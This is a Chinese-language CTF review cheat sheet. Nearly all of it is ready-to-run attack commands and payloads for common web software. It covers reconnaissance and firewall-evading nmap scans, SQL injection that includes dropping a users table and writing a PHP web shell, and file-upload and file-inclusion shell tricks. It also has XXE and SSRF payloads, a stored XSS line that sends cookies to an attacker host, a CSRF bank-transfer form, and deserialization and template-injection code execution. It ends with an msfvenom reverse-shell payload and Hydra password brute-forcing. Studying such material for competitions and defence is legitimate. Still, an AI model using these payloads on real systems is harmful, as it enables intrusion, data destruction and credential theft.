一、信息收集与侦察
# 子域名枚举
subfinder -d target.com -o subdomains.txt
amass enum -d target.com
# 证书透明度
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u
# DNS爆破
dnsrecon -d target.com -D /usr/share/wordlists/dns.txt -t brt
# 目录爆破
dirb http://target.com /usr/share/wordlists/dirb/common.txt -r -X .php,.txt
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -t 50 -x php,html,txt
# 特殊文件:/.git/HEAD /.svn/entries /.DS_Store /robots.txt
# 端口扫描
nmap -sS -sV -sC -O -p- -T4 target.com
# UDP扫描
nmap -sU -p 53,123,161,500 -T4 target.com
# 绕过防火墙
nmap -f --mtu 8 -D RND:10 target.com
二、SQL注入
# 联合查询
' UNION SELECT 1,2,3--+
' UNION SELECT 1,database(),version()--+
# 报错注入(MySQL)
' AND extractvalue(1,concat(0x7e,(SELECT database())))
' AND updatexml(1,concat(0x7e,(SELECT user())),1)
# 布尔盲注
' AND SUBSTRING((SELECT database()),1,1)='t'--+
# 时间盲注
' AND IF((SELECT LENGTH(database()))>3,SLEEP(2),0)--+
# 堆叠注入
'; DROP TABLE users--+
'; SELECT '<?php phpinfo();?>' INTO OUTFILE '/var/www/html/shell.php'--+
# 常用函数
database(), user(), version(), @@datadir, load_file('/etc/passwd')
三、文件上传绕过
# 后缀绕过
.asp .php .php3 .php4 .php5 .phtml .pht .shtml .asa .cer .jsp .jspx
# 双重扩展名
shell.php.jpg shell.php;.jpg shell.php%00.jpg
# MIME伪造
Content-Type: image/jpeg Content-Type: image/gif
# 文件头伪造
GIF89a <?php ... ?>
# 图片马-合并
copy normal.jpg /b + shell.php /a shell.jpg
# .htaccess上传
AddType application/x-httpd-php .jpg
# .user.ini (PHP 5.3+)
auto_prepend_file = shell.jpg
# 条件竞争
while true; do echo '<?php [CODE_REMOVED] ?>' > /var/www/html/shell.php; done
四、文件包含与RCE
# LFI读取文件
../../../etc/passwd
../../../proc/self/environ
# PHP伪协议
php://filter/convert.base64-encode/resource=index.php
# 日志注入
User-Agent: <?php system($_GET['cmd']); ?>
# 写入Session
php://filter/write=convert.base64-decode/resource=shell.php
# RCE危险函数
# PHP: system(), exec(), shell_exec(), passthru(), `cmd`, popen(), proc_open()
# Python: eval(), exec(), os.system(), subprocess.call()
# Node: eval(), exec(), vm.runInNewContext()
五、SSRF与XXE
# SSRF利用
curl http://127.0.0.1:8080/admin
file:///etc/passwd dict://127.0.0.1:6379/info
# XXE读取文件
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
# XXE SSRF
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal:8080/">]>
六、XSS与CSRF
# 反射型
<script>alert(1)</script>
<img src=x onerror=alert(1)>
# 存储型
<script>new Image().src="http://attacker/steal?c="+document.cookie</script>
# DOM型
#eval(location.hash.slice(1))
# CSRF PoC
<form action="http://bank/transfer" method=POST>
<input type=hidden name=to value=attacker>
<input type=hidden name=amount value=10000>
</form><script>document.forms[0].submit()</script>
七、PHP反序列化
# 基本POP链构造
class Example { public $cmd = "id"; function __destruct() { system($this->cmd); } }
echo serialize(new Example);
# O:7:"Example":1:{s:3:"cmd";s:2:"id";}
# Phar反序列化
$phar = new Phar("test.phar");
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata(new Example());
# 触发:phar://test.phar
八、SSTI模板注入
# Jinja2 (Flask)
{{7*7}} {{config}} {{request}}
{{get_flashed_messages.__globals__['__builtins__']['__import__']('os').popen('id').read()}}
# Twig (PHP)
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
# Smarty (PHP)
{php}phpinfo(){/php}
{$smarty.const._Smarty_}{Smarty_Internal_Write_File::_phpcode()}
九、JWT攻击
# alg=none
{"alg":"none","typ":"JWT"} + 空签名
# 弱密钥爆破
python jwt_tool.py target_jwt -C -d /usr/share/wordlists/rockyou.txt
# kid注入
{"kid":"../../../etc/passwd","alg":"HS256","typ":"JWT"}
十、工具速查
# Searchsploit
searchsploit apache 2.4.49
searchsploit -m exploits/multi/http/xxx.py
# Msfvenom
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf -o shell.elf
# Hydra
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com ssh
CTF赛前复习总结:考点速查与实战手册
本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。